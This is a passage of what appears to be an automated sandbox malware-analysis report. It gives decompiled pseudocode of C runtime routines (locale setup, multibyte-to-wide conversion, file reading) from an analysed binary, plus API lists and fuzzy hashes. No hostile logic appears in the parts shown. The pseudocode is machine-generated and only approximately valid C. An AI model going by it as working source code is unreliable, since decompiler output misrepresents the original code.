                						if(_t63 != 0) {
                							goto L30;
                						} else {
                							_t64 = E00EB5727(_t80,  *((intOrPtr*)(_t98 + 0x18)), _t95, _t92);
                							_t106 = _t105 + 0x10;
                							__eflags = _t64;
                							if(_t64 != 0) {
                								goto L30;
                							} else {
                								_t65 = E00EB5727( *((intOrPtr*)(_t98 - 0x1e8)), 0x55, _t95, _t92);
                								_t107 = _t106 + 0x10;
                								__eflags = _t65;
                								if(_t65 != 0) {
                									goto L30;
                								} else {
                									_t92 = 0x83;
                									goto L18;
                								}
                							}
                						}
                					}
                				} else {
                					_t92 = 0x83;
                					_push(_t98 - 0x1d0);
                					E00EB7294(_t80, _t82, _t91, 0x83,  *((intOrPtr*)(_t98 - 0x1d4)), 0x83);
                					_t107 = _t101 + 0xc;
                					if(_t80 == 0) {
                						L18:
                						_t80 = 0;
                						__eflags =  *_t95;
                						if( *_t95 == 0) {
                							L22:
                							_t82 = 0;
                							__eflags = 0;
                							 *((short*)( *((intOrPtr*)(_t98 - 0x1e0)))) = 0;
                							goto L23;
                						} else {
                							_t70 =  *((intOrPtr*)(_t98 - 0x1e4));
                							__eflags = _t70 - _t92;
                							if(_t70 >= _t92) {
                								goto L22;
                							} else {
                								_t72 = E00EB5727( *((intOrPtr*)(_t98 - 0x1e0)), _t92, _t95, _t70 + 1);
                								_t107 = _t107 + 0x10;
                								__eflags = _t72;
                								if(_t72 == 0) {
                									L23:
                									_t92 =  *(_t98 - 0x1f0);
                									__eflags = _t92;
                									if(_t92 != 0) {
                										E00EB32E0(_t92,  *((intOrPtr*)(_t98 - 0x1d8)), 4);
                										_t107 = _t107 + 0xc;
                									}
                									_t80 =  *((intOrPtr*)(_t98 - 0x1d4));
                									_t95 =  *(_t98 - 0x1ec);
                									_t67 = E00EB55AD( *(_t98 - 0x1ec),  *((intOrPtr*)(_t98 + 0x10)),  *((intOrPtr*)(_t98 - 0x1d4)));
                									__eflags = _t67;
                									if(_t67 != 0) {
                										goto L30;
                									} else {
                										L2:
                										_pop(_t93);
                										_pop(_t97);
                										__eflags =  *(_t98 - 4) ^ _t98;
                										_pop(_t81);
                										return E00EB1E0D(_t81,  *(_t98 - 4) ^ _t98, _t91, _t93, _t97);
                									}
                								} else {
                									_push(0);
                									_push(0);
                									_push(0);
                									_push(0);
                									_push(0);
                									goto L31;
                								}
                							}
                						}
                					} else {
                						_t79 = E00EB5727(_t80,  *((intOrPtr*)(_t98 + 0x18)), _t98 - 0xb0, E00EB5609(_t98 - 0xb0) + 1);
                						_t107 = _t107 + 0x14;
                						if(_t79 == 0) {
                							goto L18;
                						} else {
                							L30:
                							_push(0);
                							_push(0);
                							_push(0);
                							_push(0);
                							_push(0);
                							L31:
                							E00EAEB49(_t80, _t91);
                							asm("int3");
                							_push(8);
                							_push(0xecc538);
                							_t46 = E00EAF1E0(_t80, _t92, _t95);
                							_t96 =  *((intOrPtr*)(_t98 + 8));
                							if(_t96 != 0) {
                								_t48 = E00EB20A9(_t82, 0xd);
                								 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
                								_t84 =  *((intOrPtr*)(_t96 + 4));
                								if( *((intOrPtr*)(_t96 + 4)) != 0) {
                									asm("lock xadd [ecx], eax");
                									if((_t48 | 0xffffffff) == 0 &&  *((intOrPtr*)(_t96 + 4)) != 0xeceac8) {
                										E00EB2248( *((intOrPtr*)(_t96 + 4)));
                										_pop(_t84);
                									}
                								}
                								 *(_t98 - 4) = 0xfffffffe;
                								E00EB78AF();
                								if( *_t96 != 0) {
                									E00EB20A9(_t84, 0xc);
                									 *(_t98 - 4) = 1;
                									E00EB4248( *_t96);
                									_t52 =  *_t96;
                									if(_t52 != 0 &&  *_t52 == 0 && _t52 != 0xece800) {
                										E00EB40EE(_t52);
                									}
                									 *(_t98 - 4) = 0xfffffffe;
                									E00EB78BB();
                								}
                								_t46 = E00EB2248(_t96);
                							}
                							return E00EAF225(_t46);
                						}
                					}
                				}
                			}


                APIs
                • ___get_qualified_locale_downlevel.LIBCMT ref: 00EB765E
                  • Part of subcall function 00EBEA44: _memset.LIBCMT ref: 00EBEA7A
                  • Part of subcall function 00EBEA44: GetUserDefaultLCID.KERNEL32(?,?,00000055), ref: 00EBEB5D
                  • Part of subcall function 00EBEA44: IsValidCodePage.KERNEL32(00000000), ref: 00EBEBB1
                  • Part of subcall function 00EBEA44: IsValidLocale.KERNEL32(?,00000001), ref: 00EBEBC4
                  • Part of subcall function 00EBEA44: ___crtDownlevelLCIDToLocaleName.LIBCMT ref: 00EBEBE3
                  • Part of subcall function 00EBEA44: ___crtDownlevelLCIDToLocaleName.LIBCMT ref: 00EBEBFE
                  • Part of subcall function 00EBEA44: GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 00EBEC17
                  • Part of subcall function 00EBEA44: GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00EBEC2E
                • ___get_qualified_locale.LIBCMT ref: 00EB7665
                • __invoke_watson.LIBCMT ref: 00EB7807
                • __lock.LIBCMT ref: 00EB7826
                • _free.LIBCMT ref: 00EB784C
                • __lock.LIBCMT ref: 00EB7865
                • ___removelocaleref.LIBCMT ref: 00EB7874
                • ___freetlocinfo.LIBCMT ref: 00EB788D
                • _free.LIBCMT ref: 00EB78A0
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: Locale$DownlevelInfoNameValid___crt__lock_free$CodeDefaultPageUser___freetlocinfo___get_qualified_locale___get_qualified_locale_downlevel___removelocaleref__invoke_watson_memset
                • String ID:
                • API String ID: 326597126-0
                • Opcode ID: 74ceaa93ed26513bf724ab8611d67c8cecb507a695a828ee7681fd132f52846a
                • Instruction ID: 225c511abe74d94d6a60d0bfd0a376a575d76ec378454b8244fe096110d399d4
                • Opcode Fuzzy Hash: 74ceaa93ed26513bf724ab8611d67c8cecb507a695a828ee7681fd132f52846a
                • Instruction Fuzzy Hash: A6313971509315AADB38ABA09D0AFEB33E8AF80314F18356EF494B69D2CF35DE41C651
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E00EA6AE0(void* __ecx, signed int __edx) {
                				intOrPtr _t44;
                				void* _t56;
                				void* _t62;
                				signed int _t72;
                				signed int _t73;
                				signed int _t76;
                				intOrPtr _t78;
                				signed int _t83;
                				void* _t84;
                
                				_t76 = __edx;
                				_t62 = E00EB22C8(__ecx, __edx);
                				_t87 = _t62;
                				if(_t62 == 0) {
                					L24:
                					return E00EAF225(_t78);
                				} else {
                					memcpy(_t62,  *( *((intOrPtr*)(_t84 - 0x20)) + 0x68), 0x88 << 2);
                					_t83 = 0;
                					 *_t62 = 0;
                					_t78 = E00EB48E9(_t76,  *( *((intOrPtr*)(_t84 - 0x20)) + 0x68) + 0x110, _t87,  *((intOrPtr*)(_t84 + 8)), _t62);
                					 *((intOrPtr*)(_t84 + 8)) = _t78;
                					if(_t78 != 0) {
                						__eflags = _t78 - 0xffffffff;
                						if(_t78 == 0xffffffff) {
                							__eflags = _t62 - 0xeceac8;
                							if(_t62 != 0xeceac8) {
                								E00EB2248(_t62);
                							}
                							 *((intOrPtr*)(E00EAF100())) = 0x16;
                						}
                						goto L24;
                					}
                					_t44 =  *((intOrPtr*)(_t84 - 0x20));
                					_t70 =  *(_t44 + 0x68);
                					asm("lock xadd [ecx], edx");
                					if((_t76 | 0xffffffff) == 0) {
                						_t70 =  *(_t44 + 0x68);
                						if( *(_t44 + 0x68) != 0xeceac8) {
                							E00EB2248(_t70);
                							_pop(_t70);
                							_t44 =  *((intOrPtr*)(_t84 - 0x20));
                						}
                					}
                					 *(_t44 + 0x68) = _t62;
                					asm("lock xadd [ebx], eax");
                					if(( *( *((intOrPtr*)(_t84 - 0x20)) + 0x70) & 0x00000002) == 0 && ( *0xecee10 & 0x00000001) == 0) {
                						E00EB20A9(_t70, 0xd);
                						 *(_t84 - 4) = _t83;
                						 *0xecfcd4 =  *((intOrPtr*)(_t62 + 4));
                						 *0xecfcd8 =  *((intOrPtr*)(_t62 + 8));
                						 *0xecfce8 =  *((intOrPtr*)(_t62 + 0x21c));
                						_t72 = _t83;
                						while(1) {
                							 *(_t84 - 0x1c) = _t72;
                							if(_t72 >= 5) {
                								break;
                							}
                							 *((short*)(0xecfcdc + _t72 * 2)) =  *((intOrPtr*)(_t62 + 0xc + _t72 * 2));
                							_t72 = _t72 + 1;
                						}
                						_t73 = _t83;
                						while(1) {
                							 *(_t84 - 0x1c) = _t73;
                							__eflags = _t73 - 0x101;
                							if(_t73 >= 0x101) {
                								goto L14;
                							}
                							 *((char*)(_t73 + 0xece8c0)) =  *((intOrPtr*)(_t73 + _t62 + 0x18));
                							_t73 = _t73 + 1;
                						}
                						while(1) {
                							L14:
                							 *(_t84 - 0x1c) = _t83;
                							__eflags = _t83 - 0x100;
                							if(_t83 >= 0x100) {
                								break;
                							}
                							 *((char*)(_t83 + 0xece9c8)) =  *((intOrPtr*)(_t83 + _t62 + 0x119));
                							_t83 = _t83 + 1;
                						}
                						__eflags = _t73 | 0xffffffff;
                						asm("lock xadd [eax], ecx");
                						if((_t73 | 0xffffffff) == 0) {
                							_t56 =  *0xececec; // 0x910660
                							__eflags = _t56 - 0xeceac8;
                							if(_t56 != 0xeceac8) {
                								E00EB2248(_t56);
                							}
                						}
                						 *0xececec = _t62;
                						asm("lock xadd [ebx], eax");
                						 *(_t84 - 4) = 0xfffffffe;
                						E00EB48B3();
                					}
                					goto L24;
                				}
                			}

                APIs
                • __malloc_crt.LIBCMT ref: 00EB477C
                  • Part of subcall function 00EB22C8: _malloc.LIBCMT ref: 00EB22D9
                • __setmbcp_nolock.LIBCMT ref: 00EB47A3
                  • Part of subcall function 00EB48E9: getSystemCP.LIBCMT ref: 00EB4901
                  • Part of subcall function 00EB48E9: setSBCS.LIBCMT ref: 00EB490E
                • _free.LIBCMT ref: 00EB47D2
                  • Part of subcall function 00EB2248: HeapFree.KERNEL32(00000000,00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB225C
                  • Part of subcall function 00EB2248: GetLastError.KERNEL32(00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB226E
                • __lock.LIBCMT ref: 00EB4801
                • _free.LIBCMT ref: 00EB488F
                • _free.LIBCMT ref: 00EB48CC
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLastSystem__lock__malloc_crt__setmbcp_nolock_malloc
                • String ID:
                • API String ID: 3263399035-0
                • Opcode ID: 290df9d7e024dc7a20263ac9bb4716107a55e701004fd956227c60a13467f8b2
                • Instruction ID: 5b47843d5672c3e6c1e9ddbe36e0649cf0816162a67ac3f501faebf8120e6b0e
                • Opcode Fuzzy Hash: 290df9d7e024dc7a20263ac9bb4716107a55e701004fd956227c60a13467f8b2
                • Instruction Fuzzy Hash: 9D41DAB4A002848FDB19DF68D481AEA77E4BB05324B14516DF955BB7E3CB359C42CB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00EBA436(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                				char _v8;
                				intOrPtr _v12;
                				signed int _v20;
                				signed int _t35;
                				int _t38;
                				signed int _t41;
                				int _t42;
                				intOrPtr* _t44;
                				int _t47;
                				short* _t49;
                				intOrPtr _t50;
                				intOrPtr _t54;
                				int _t55;
                				signed int _t59;
                				char* _t62;
                
                				_t62 = _a8;
                				if(_t62 == 0) {
                					L5:
                					return 0;
                				}
                				_t50 = _a12;
                				if(_t50 == 0) {
                					goto L5;
                				}
                				if( *_t62 != 0) {
                					E00EB2DB9( &_v20, _a16);
                					_t35 = _v20;
                					__eflags =  *(_t35 + 0xa8);
                					if( *(_t35 + 0xa8) != 0) {
                						_t38 = E00EBA1C7( *_t62 & 0x000000ff,  &_v20);
                						__eflags = _t38;
                						if(_t38 == 0) {
                							__eflags = _a4;
                							_t41 = _v20;
                							_t59 = 1;
                							_t28 = _t41 + 4; // 0x840ffff8
                							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                							__eflags = _t42;
                							if(_t42 != 0) {
                								L21:
                								__eflags = _v8;
                								if(_v8 != 0) {
                									_t54 = _v12;
                									_t31 = _t54 + 0x70;
                									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                									__eflags =  *_t31;
                								}
                								return _t59;
                							}
                							L20:
                							_t44 = E00EAF100();
                							_t59 = _t59 | 0xffffffff;
                							__eflags = _t59;
                							 *_t44 = 0x2a;
                							goto L21;
                						}
                						_t59 = _v20;
                						__eflags =  *(_t59 + 0x74) - 1;
                						if( *(_t59 + 0x74) <= 1) {
                							L15:
                							_t20 = _t59 + 0x74; // 0xe1c11fe1
                							__eflags = _t50 -  *_t20;
                							L16:
                							if(__eflags < 0) {
                								goto L20;
                							}
                							__eflags = _t62[1];
                							if(_t62[1] == 0) {
                								goto L20;
                							}
                							L18:
                							_t22 = _t59 + 0x74; // 0xe1c11fe1
                							_t59 =  *_t22;
                							goto L21;
                						}
                						_t12 = _t59 + 0x74; // 0xe1c11fe1
                						__eflags = _t50 -  *_t12;
                						if(__eflags < 0) {
                							goto L16;
                						}
                						__eflags = _a4;
                						_t17 = _t59 + 0x74; // 0xe1c11fe1
                						_t18 = _t59 + 4; // 0x840ffff8
                						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                						_t59 = _v20;
                						__eflags = _t47;
                						if(_t47 != 0) {
                							goto L18;
                						}
                						goto L15;
                					}
                					_t55 = _a4;
                					__eflags = _t55;
                					if(_t55 != 0) {
                						 *_t55 =  *_t62 & 0x000000ff;
                					}
                					_t59 = 1;
                					goto L21;
                				}
                				_t49 = _a4;
                				if(_t49 != 0) {
                					 *_t49 = 0;
                				}
                				goto L5;
                			}

                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00EBA46C
                • __isleadbyte_l.LIBCMT ref: 00EBA49A
                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 00EBA4C8
                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00EBA4FE
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                • String ID: >,
                • API String ID: 3058430110-1189350311
                • Opcode ID: a975d527b8109d81b9a55d9f50db0c0c35dda6eb7e6c78e679fadb0cb3c61c5c
                • Instruction ID: 3f7fa0d411fbacbc6bf87f3495abeb898d0c7c80f3767f1aabdf3aa844e6c0e9
                • Opcode Fuzzy Hash: a975d527b8109d81b9a55d9f50db0c0c35dda6eb7e6c78e679fadb0cb3c61c5c
                • Instruction Fuzzy Hash: 9831CF30600246AFDF218F65C848BFB7BA5FF41314F199139F865A7190E770E950DB92
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 60%
                			E00EB721D(void* __ebx, void* __edi, intOrPtr _a4) {
                				char* _v24;
                				intOrPtr _v28;
                				signed int _v36;
                				signed int _v40;
                				short _v300;
                				void* __esi;
                				void* _t15;
                				void* _t17;
                				signed int _t20;
                				char* _t22;
                				signed int _t30;
                				void* _t33;
                				void* _t40;
                				void* _t42;
                				void* _t46;
                				void* _t47;
                				void* _t49;
                				void* _t51;
                				signed int _t52;
                
                				if(_a4 != 0) {
                					_push(__ebx);
                					_t30 = E00EBDBB1(_a4, 0x55);
                					_pop(_t33);
                					if(_t30 < 0x55) {
                						_push(__edi);
                						_t15 = E00EB22C8(_t33, _t40, 2 + _t30 * 2);
                						_t42 = _t15;
                						if(_t42 != 0) {
                							_t5 = _t30 + 1; // 0x1
                							_t17 = E00EB5727(_t42, _t5, _a4, _t5);
                							_t52 = _t51 + 0x10;
                							if(_t17 != 0) {
                								_push(0);
                								_push(0);
                								_push(0);
                								_push(0);
                								_push(0);
                								E00EAEB49(_t30, _t40);
                								asm("int3");
                								_t49 = _t47;
                								_push(_t49);
                								_t50 = _t52;
                								_t20 =  *0xece400; // 0x41bad13e
                								_v40 = _t20 ^ _t52;
                								_t22 = _v24;
                								_t45 = _v28;
                								if(_v28 <= 5 && _t22 != 0 && MultiByteToWideChar(0, 0, _t22, 0xffffffff,  &_v300, 0x83) != 0) {
                									E00EB7973(_t30, _t40, _t45,  &_v300);
                								}
                								_pop(_t46);
                								return E00EB1E0D(_t30, _v36 ^ _t50, _t40, _t42, _t46);
                							} else {
                								_t15 = _t42;
                								goto L5;
                							}
                						} else {
                							L5:
                							goto L6;
                						}
                					} else {
                						_t15 = 0;
                						L6:
                						return _t15;
                					}
                				} else {
                					return 0;
                				}
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _wcsnlen
                • String ID: U
                • API String ID: 3628947076-3372436214
                • Opcode ID: 32616be13f85c62341beb63ec7adddd1844143b756ccbdc31340d0c320fed0ec
                • Instruction ID: 622e5a34df4c7055181c6a58499c0bb5ece341e994d90cad7854b7bdbad77b6c
                • Opcode Fuzzy Hash: 32616be13f85c62341beb63ec7adddd1844143b756ccbdc31340d0c320fed0ec
                • Instruction Fuzzy Hash: 76212B7120C208AEEB109A649C46FFB33ECDBC5764F505565F948F6990FA61EE008690
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E00EA622B(signed int __ebx, signed int __edx, intOrPtr* __edi, signed int __esi) {
                				intOrPtr _t83;
                				signed char _t84;
                				intOrPtr _t86;
                				signed int _t87;
                				signed char _t89;
                				signed int _t90;
                				signed int _t92;
                				long _t100;
                				signed int _t105;
                				char _t106;
                				char _t107;
                				signed int _t109;
                				char* _t113;
                				void* _t114;
                				void* _t117;
                				void* _t118;
                				void* _t119;
                				signed int _t122;
                				signed int _t123;
                				intOrPtr _t125;
                				void* _t126;
                				intOrPtr _t127;
                				intOrPtr _t129;
                				signed int _t136;
                				signed int _t138;
                				intOrPtr* _t140;
                				signed int _t142;
                				char* _t144;
                				signed int _t145;
                				signed char* _t147;
                				int _t148;
                				signed int _t149;
                				void* _t150;
                				void* _t152;
                				void* _t165;
                
                				_t145 = __esi;
                				_t140 = __edi;
                				_t136 = __edx;
                				_t122 = __ebx;
                				while(1) {
                					L12:
                					_t140 = _t140 + 1;
                					if(ReadFile( *( *((intOrPtr*)(0xecf230 + _t136 * 4)) + _t122), _t150 - 1, 1, _t150 - 0x14, 0) != 0 || GetLastError() == 0) {
                						goto L14;
                					}
                					L29:
                					_t136 =  *(_t150 - 0xc);
                					_t126 = 0xd;
                					 *_t145 = _t126;
                					_t145 = _t145 + 1;
                					L24:
                					while(_t140 <  *((intOrPtr*)(_t150 - 0x1c))) {
                						_t83 =  *_t140;
                						__eflags = _t83 - 0x1a;
                						if(_t83 == 0x1a) {
                							_t127 =  *((intOrPtr*)(0xecf230 + _t136 * 4));
                							_t84 =  *(_t127 + _t122 + 4);
                							__eflags = _t84 & 0x00000040;
                							if((_t84 & 0x00000040) != 0) {
                								 *_t145 =  *_t140;
                								_t145 = _t145 + 1;
                								__eflags = _t145;
                							} else {
                								 *(_t127 + _t122 + 4) = _t84 | 0x00000002;
                							}
                						} else {
                							__eflags = _t83 - _t126;
                							if(_t83 == _t126) {
                								__eflags = _t140 -  *((intOrPtr*)(_t150 - 0x1c)) - 1;
                								if(_t140 >=  *((intOrPtr*)(_t150 - 0x1c)) - 1) {
                									goto L12;
                								} else {
                									_t113 = _t140 + 1;
                									__eflags =  *_t113 - 0xa;
                									if( *_t113 != 0xa) {
                										 *_t145 = _t126;
                										_t140 = _t113;
                										_t145 = _t145 + 1;
                									} else {
                										_t114 = 0xa;
                										_t140 = _t140 + 2;
                										 *_t145 = _t114;
                										L28:
                										_t145 = _t145 + 1;
                									}
                								}
                							} else {
                								 *_t145 = _t83;
                								_t145 = _t145 + 1;
                								_t140 = _t140 + 1;
                							}
                							continue;
                						}
                						L33:
                						_t38 = _t150 - 0x10; // 0xeb2b47
                						_t86 =  *_t38;
                						_t142 = _t145 - _t86;
                						if( *((char*)(_t150 + 0x13)) != 1 || _t142 == 0) {
                							L58:
                							_t123 =  *(_t150 - 0x18);
                						} else {
                							_t147 = _t145 - 1;
                							_t89 =  *_t147;
                							if(_t89 < 0) {
                								_t90 = _t89 & 0x000000ff;
                								_t138 = 1;
                								__eflags =  *((char*)(_t90 + 0xece408));
                								if( *((char*)(_t90 + 0xece408)) == 0) {
                									_t41 = _t150 - 0x10; // 0xeb2b47
                									_t125 =  *_t41;
                									while(1) {
                										__eflags = _t138 - 4;
                										if(_t138 > 4) {
                											break;
                										}
                										__eflags = _t147 - _t125;
                										if(_t147 >= _t125) {
                											_t147 = _t147 - 1;
                											_t138 = _t138 + 1;
                											_t109 =  *_t147 & 0x000000ff;
                											__eflags =  *((char*)(_t109 + 0xece408));
                											if( *((char*)(_t109 + 0xece408)) == 0) {
                												continue;
                											}
                										}
                										break;
                									}
                									_t122 =  *(_t150 - 0x24);
                								}
                								_t92 =  *((char*)(( *_t147 & 0x000000ff) + 0xece408));
                								__eflags = _t92;
                								if(_t92 != 0) {
                									__eflags = _t92 + 1 - _t138;
                									if(_t92 + 1 != _t138) {
                										_t129 =  *((intOrPtr*)(0xecf230 +  *(_t150 - 0xc) * 4));
                										__eflags =  *(_t129 + _t122 + 4) & 0x00000048;
                										if(__eflags == 0) {
                											asm("cdq");
                											E00EB3F56(_t129, __eflags,  *((intOrPtr*)(_t150 + 8)),  ~_t138,  ~_t138, 1);
                											_t152 = _t152 + 0x10;
                										} else {
                											_t149 =  &(_t147[1]);
                											 *((char*)(_t129 + _t122 + 5)) =  *_t147;
                											_t105 =  *(_t150 - 0xc);
                											__eflags = _t138 - 2;
                											if(_t138 >= 2) {
                												_t107 =  *_t149;
                												_t149 = _t149 + 1;
                												__eflags = _t149;
                												 *((char*)( *((intOrPtr*)(0xecf230 + _t105 * 4)) + _t122 + 0x25)) = _t107;
                												_t105 =  *(_t150 - 0xc);
                											}
                											__eflags = _t138 - 3;
                											if(_t138 == 3) {
                												_t106 =  *_t149;
                												_t149 = _t149 + 1;
                												__eflags = _t149;
                												 *((char*)( *((intOrPtr*)(0xecf230 + _t105 * 4)) + _t122 + 0x26)) = _t106;
                											}
                											_t147 = _t149 - _t138;
                										}
                									} else {
                										_t147 =  &(_t147[_t138]);
                									}
                									goto L54;
                								} else {
                									 *((intOrPtr*)(E00EAF100())) = 0x2a;
                									goto L3;
                								}
                							} else {
                								_t147 =  &(_t147[1]);
                								L54:
                								_t66 = _t150 - 0x10; // 0xeb2b47
                								_t144 =  *_t66;
                								_t148 = _t147 - _t144;
                								_t142 = MultiByteToWideChar(0xfde9, 0, _t144, _t148,  *(_t150 + 0xc),  *(_t150 - 0x28) >> 1);
                								if(_t142 == 0) {
                									_t100 = GetLastError();
                									E00EAF0DF(_t100);
                									L3:
                									_t123 = _t122 | 0xffffffff;
                									__eflags = _t123;
                									_t1 = _t150 - 0x10; // 0xeb2b47
                									_t86 =  *_t1;
                								} else {
                									_t165 = _t142 - _t148;
                									_t142 = _t142 + _t142;
                									 *( *((intOrPtr*)(0xecf230 +  *(_t150 - 0xc) * 4)) + _t122 + 0x30) = 0 | _t165 != 0x00000000;
                									asm("sbb [eax], dh");
                									_t75 = _t150 - 0x10; // 0xeb2b47
                									_t86 =  *_t75;
                									goto L58;
                								}
                							}
                						}
                						L59:
                						if(_t86 !=  *(_t150 + 0xc)) {
                							E00EB2248(_t86);
                						}
                						if(_t123 != 0xfffffffe) {
                							_t142 = _t123;
                						}
                						_t87 = _t142;
                						return _t87;
                					}
                					goto L33;
                					L14:
                					if( *(_t150 - 0x14) == 0) {
                						goto L29;
                					} else {
                						_t136 =  *(_t150 - 0xc);
                						if(( *( *((intOrPtr*)(0xecf230 + _t136 * 4)) + _t122 + 4) & 0x00000048) == 0) {
                							_t23 = _t150 - 0x10; // 0xeb2b47
                							__eflags = _t145 -  *_t23;
                							if(__eflags != 0) {
                								L26:
                								E00EB3F56(_t126, __eflags,  *((intOrPtr*)(_t150 + 8)), 0xffffffff, 0xffffffff, 1);
                								_t136 =  *(_t150 - 0xc);
                								_t152 = _t152 + 0x10;
                								_t117 = 0xa;
                								__eflags =  *(_t150 - 1) - _t117;
                								if( *(_t150 - 1) == _t117) {
                									goto L22;
                								} else {
                									_t126 = 0xd;
                									 *_t145 = _t126;
                									goto L28;
                								}
                								goto L59;
                							} else {
                								_t118 = 0xa;
                								__eflags =  *(_t150 - 1) - _t118;
                								if(__eflags != 0) {
                									goto L26;
                								} else {
                									 *_t145 = _t118;
                									_t145 = _t145 + 1;
                									__eflags = _t145;
                									L22:
                									_push(0xd);
                									goto L23;
                								}
                							}
                						} else {
                							_t119 = 0xa;
                							_push(0xd);
                							if( *(_t150 - 1) != _t119) {
                								 *_t145 = 0xd;
                								_t145 = _t145 + 1;
                								 *((char*)( *((intOrPtr*)(0xecf230 + _t136 * 4)) + _t122 + 5)) =  *(_t150 - 1);
                							} else {
                								 *_t145 = _t119;
                								_t145 = _t145 + 1;
                							}
                							L23:
                							_pop(_t126);
                						}
                					}
                					goto L24;
                				}
                			}







































                APIs
                • ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?,00000001,00000000,?,?,?,?,?,?,00EB2B47), ref: 00EAFB7C
                • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,?,?,?,?,00EB2B47,?,00000080,00000003), ref: 00EAFB86
                • __lseeki64_nolock.LIBCMT ref: 00EAFBF1
                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,G+,G+,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00EAFD1F
                • _free.LIBCMT ref: 00EAFD52
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ByteCharErrorFileLastMultiReadWide__lseeki64_nolock_free
                • String ID: G+
                • API String ID: 1844164652-804368800
                • Opcode ID: 21390e061c66065c7d4ee5e22fad37ea63a50d7a5f92c400cc64ffeda891c4a3
                • Instruction ID: 7392e6b12f26c4e0a492a304c54e8623a1ec96900f0ca7c4519a7a573e700583
                • Opcode Fuzzy Hash: 21390e061c66065c7d4ee5e22fad37ea63a50d7a5f92c400cc64ffeda891c4a3
                • Instruction Fuzzy Hash: D221F535A002059FDB11CFE9D884FAEB7B5AF4A714F145075E955FF290CA31A8468B60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 81%
                			E00EA600E(void* __edx, void* __edi, void* __esi) {
                				long _t33;
                				signed int _t40;
                				signed int _t43;
                				signed char _t45;
                				void* _t47;
                				signed int _t52;
                				void* _t54;
                				signed int _t56;
                				void* _t57;
                				void* _t60;
                				signed int _t61;
                				void* _t62;
                
